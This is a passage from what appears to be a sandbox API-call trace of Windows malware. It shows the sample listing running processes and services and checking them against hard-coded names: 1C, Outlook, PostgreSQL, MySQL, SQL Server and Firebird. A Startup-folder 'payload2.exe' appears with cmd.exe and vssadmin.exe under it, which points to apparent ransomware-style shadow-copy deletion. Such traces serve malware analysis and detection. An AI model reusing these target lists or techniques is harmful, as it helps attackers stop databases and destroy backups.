th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.627] lstrlenW (lpString="csrss.exe") returned 9 [0040.627] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.627] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0040.627] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0040.627] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0040.627] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0040.627] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0040.627] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0040.627] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.628] lstrlenW (lpString="wininit.exe") returned 11 [0040.628] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0040.628] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0040.628] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0040.628] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0040.628] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0040.628] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0040.628] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0040.628] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.628] lstrlenW (lpString="csrss.exe") returned 9 [0040.629] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.629] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0040.629] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0040.629] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0040.629] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0040.629] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0040.629] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.629] lstrlenW (lpString="winlogon.exe") returned 12 [0040.629] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.630] lstrlenW (lpString="services.exe") returned 12 [0040.630] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.631] lstrlenW (lpString="lsass.exe") returned 9 [0040.631] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.631] lstrlenW (lpString="lsm.exe") returned 7 [0040.631] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.632] lstrlenW (lpString="svchost.exe") returned 11 [0040.632] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.632] lstrlenW (lpString="svchost.exe") returned 11 [0040.632] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.633] lstrlenW (lpString="svchost.exe") returned 11 [0040.633] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.633] lstrlenW (lpString="svchost.exe") returned 11 [0040.634] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.634] lstrlenW (lpString="svchost.exe") returned 11 [0040.634] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0040.635] lstrlenW (lpString="audiodg.exe") returned 11 [0040.635] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.635] lstrlenW (lpString="svchost.exe") returned 11 [0040.635] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.636] lstrlenW (lpString="svchost.exe") returned 11 [0040.636] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0040.636] lstrlenW (lpString="dwm.exe") returned 7 [0040.636] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0040.637] lstrlenW (lpString="explorer.exe") returned 12 [0040.637] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0040.638] lstrlenW (lpString="spoolsv.exe") returned 11 [0040.638] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.638] lstrlenW (lpString="taskhost.exe") returned 12 [0040.638] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.639] lstrlenW (lpString="svchost.exe") returned 11 [0040.639] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0040.639] lstrlenW (lpString="taskeng.exe") returned 11 [0040.639] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.640] lstrlenW (lpString="taskhost.exe") returned 12 [0040.640] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0040.641] lstrlenW (lpString="challenging.exe") returned 15 [0040.641] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0040.641] lstrlenW (lpString="pgp prix.exe") returned 12 [0040.641] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0040.642] lstrlenW (lpString="user-reno.exe") returned 13 [0040.642] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0040.642] lstrlenW (lpString="aggregate.exe") returned 13 [0040.642] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0040.643] lstrlenW (lpString="dressed.exe") returned 11 [0040.643] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0040.644] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0040.644] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0040.645] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0040.645] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0040.645] lstrlenW (lpString="developing.exe") returned 14 [0040.645] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0040.646] lstrlenW (lpString="supported.exe") returned 13 [0040.646] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0040.647] lstrlenW (lpString="girlstionselect.exe") returned 19 [0040.647] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0040.647] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0040.647] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0040.648] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0040.648] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0040.648] lstrlenW (lpString="eating.exe") returned 10 [0040.649] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0040.649] lstrlenW (lpString="nh_protected.exe") returned 16 [0040.649] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0040.650] lstrlenW (lpString="vulnerability.exe") returned 17 [0040.650] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0040.650] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0040.650] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0040.651] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0040.651] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0040.652] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0040.652] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0040.652] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0040.652] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0040.653] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0040.653] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0040.654] lstrlenW (lpString="dllhost.exe") returned 11 [0040.654] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0040.654] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0040.654] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0040.655] lstrlenW (lpString="cmd.exe") returned 7 [0040.655] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0040.655] lstrlenW (lpString="conhost.exe") returned 11 [0040.655] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0040.656] lstrlenW (lpString="vssadmin.exe") returned 12 [0040.656] Process32NextW (in: hSnapshot=0x1c8, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0040.657] CloseHandle (hObject=0x1c8) returned 1 [0040.657] Sleep (dwMilliseconds=0x1f4) [0041.631] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6800f8 [0041.631] EnumServicesStatusExW (in: hSCManager=0x6800f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0041.631] GetLastError () returned 0xea [0041.631] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x3f74520 [0041.632] EnumServicesStatusExW (in: hSCManager=0x6800f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f74520, cbBufSize=0x11e4, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f74520, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0041.632] CloseServiceHandle (hSCObject=0x6800f8) returned 1 [0041.632] lstrlenW (lpString="Appinfo") returned 7 [0041.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0041.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0041.632] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0041.632] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0041.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0041.632] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0041.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.632] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0041.632] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0041.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0041.633] lstrlenW (lpString="AudioSrv") returned 8 [0041.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0041.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0041.633] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0041.633] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0041.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0041.633] lstrlenW (lpString="BFE") returned 3 [0041.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0041.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0041.633] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0041.633] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0041.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0041.633] lstrlenW (lpString="CryptSvc") returned 8 [0041.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0041.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0041.633] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0041.633] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0041.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0041.633] lstrlenW (lpString="CscService") returned 10 [0041.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0041.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0041.633] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0041.633] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0041.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0041.633] lstrlenW (lpString="DcomLaunch") returned 10 [0041.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.633] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0041.633] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0041.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0041.634] lstrlenW (lpString="Dhcp") returned 4 [0041.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0041.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0041.634] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0041.634] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0041.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0041.634] lstrlenW (lpString="Dnscache") returned 8 [0041.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0041.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0041.634] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0041.634] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0041.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0041.634] lstrlenW (lpString="DPS") returned 3 [0041.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0041.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0041.634] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0041.634] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0041.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0041.634] lstrlenW (lpString="eventlog") returned 8 [0041.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0041.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0041.634] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0041.634] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0041.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0041.634] lstrlenW (lpString="EventSystem") returned 11 [0041.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0041.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0041.635] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0041.635] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0041.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0041.635] lstrlenW (lpString="gpsvc") returned 5 [0041.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0041.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0041.635] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0041.635] lstrcmpiW (lpString1="mssqlserver", 